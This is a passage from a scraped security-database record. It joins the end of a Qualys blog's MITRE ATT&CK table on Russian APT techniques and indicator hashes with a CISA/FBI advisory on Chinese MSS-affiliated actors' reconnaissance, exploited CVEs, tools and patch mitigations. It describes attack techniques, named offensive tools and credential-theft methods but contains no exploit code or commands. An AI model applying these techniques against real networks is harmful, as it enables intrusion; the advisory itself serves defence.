\n7e154d5be14560b8b2c16969effdb8417559758711b05615513d1c84e56be076 \n923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6 \n9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d \na196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 \nb01e0c6ac0b8bcde145ab7b68cf246deea9402fa7ea3aede7105f7051fe240c1 \nb60c0c04badc8c5defab653c581d57505b3455817b57ee70af74311fa0b65e22 \nb6f2e008967c5527337448d768f2332d14b92de22a1279fd4d91000bb3d4a0fd \nc2d06ad0211c24f36978fe34d25b0018ffc0f22b0c74fd1f915c608bf2cfad15 \nd4e97a18be820a1a3af639c9bca21c5f85a3f49a37275b37fd012faeffcb7c4a \ndcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 \ne5f3ef69a534260e899a36cec459440dc572388defd8f1d98760d31c700f42d5 \nf50ee030224bf617ba71d88422c25d7e489571bc1aba9e65dc122a45122c9321 \nfd7eacc2f87aceac865b0aa97a50503d44b799f27737e009f91f3c281233c17d \n \n#### List of MITRE ATT&amp;CK TIDs provided by CISA\n\n**Tactic**| **Technique******| **Procedure****** \n---|---|--- \nReconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]| Active Scanning: Vulnerability Scanning [[T1595.002](<https://attack.mitre.org/versions/v10/techniques/T1595/002/>)]| \nRussian state-sponsored APT actors have performed large-scale scans in an attempt to find vulnerable servers. \nPhishing for Information [[T1598](<https://attack.mitre.org/versions/v10/techniques/T1598>)]| Russian state-sponsored APT actors have conducted spearphishing campaigns to gain credentials of target networks. \nResource Development [[TA0042]](<https://attack.mitre.org/versions/v10/tactics/TA0042/>)| Develop Capabilities: Malware [[T1587.001](<https://attack.mitre.org/versions/v10/techniques/T1587/001>)]| Russian state-sponsored APT actors have developed and deployed malware, including ICS-focused destructive malware. \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]| Exploit Public Facing Applications [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]| Russian state-sponsored APT actors use publicly known vulnerabilities, as well as zero-days, in internet-facing systems to gain access to networks. \nSupply Chain Compromise: Compromise Software Supply Chain [[T1195.002](<https://attack.mitre.org/versions/v10/techniques/T1195/002>)]| Russian state-sponsored APT actors have gained initial access to victim organizations by compromising trusted third-party software. Notable incidents include M.E.Doc accounting software and SolarWinds Orion. \nExecution [[TA0002](<https://attack.mitre.org/versions/v10/tactics/TA0002>)]| Command and Scripting Interpreter: PowerShell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)] and Windows Command Shell [[T1059.003](<https://attack.mitre.org/versions/v10/techniques/T1059/003>)]| Russian state-sponsored APT actors have used `cmd.exe` to execute commands on remote machines. They have also used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and to execute other commands. \nPersistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003>)]| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]| Russian state-sponsored APT actors have used credentials of existing accounts to maintain persistent, long-term access to compromised networks. \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006>)]| Brute Force: Password Guessing [[T1110.001](<https://attack.mitre.org/versions/v10/techniques/T1110/001>)] and Password Spraying [[T1110.003](<https://attack.mitre.org/versions/v10/techniques/T1110/003>)]| Russian state-sponsored APT actors have conducted brute-force password guessing and password spraying campaigns. \nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]| Russian state-sponsored APT actors have exfiltrated credentials and exported copies of the Active Directory database `ntds.dit`. \nSteal or Forge Kerberos Tickets: Kerberoasting [[T1558.003](<https://attack.mitre.org/versions/v10/techniques/T1558/003/>)]| Russian state-sponsored APT actors have performed \u201cKerberoasting,\u201d whereby they obtained the Ticket Granting Service (TGS) Tickets for Active Directory Service Principal Names (SPN) for offline cracking. \nCredentials from Password Stores [[T1555](<https://attack.mitre.org/versions/v10/techniques/T1555>)]| Russian state-sponsored APT actors have used previously compromised account credentials to attempt to access Group Managed Service Account (gMSA) passwords. \nExploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v10/techniques/T1212>)]| Russian state-sponsored APT actors have exploited Windows Netlogon vulnerability [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) to obtain access to Windows Active Directory servers. \nUnsecured Credentials: Private Keys [[T1552.004](<https://attack.mitre.org/versions/v10/techniques/T1552/004>)]| Russian state-sponsored APT actors have obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates. \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]| Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)]| Russian state-sponsored APT actors have used virtual private servers (VPSs) to route traffic to targets. The actors often use VPSs with IP addresses in the home country of the victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-09-23T07:31:00", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) and Pre-ATT&amp;CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&amp;CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&amp;CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposure (CVE) database, and the National Vulnerabilities Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. \n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a%20>)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a%20>)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a%20%20>)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). \n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>)\n\n| \n\nAnalyze Architecture and Configuration Posture\n\n| \n\nCISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for known vulnerable network appliance CVE-2019-11510. \n \n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>)\n\n| \n\nResearch Relevant Vulnerabilities\n\n| \n\nCISA has observed the threat actors scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs. \n \n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities _[[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. \n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&amp;CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com%20>)][[11](<https://exploit-db.com%20>)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/%20>)] \n \nThe following sections list the ATT&amp;CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. \n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### References\n\n[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)\n\n[[3] Shodan](<https://www.shodan.io>)\n\n[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)\n\n[[5] National Institute of Standards and Technology National Vulnerability 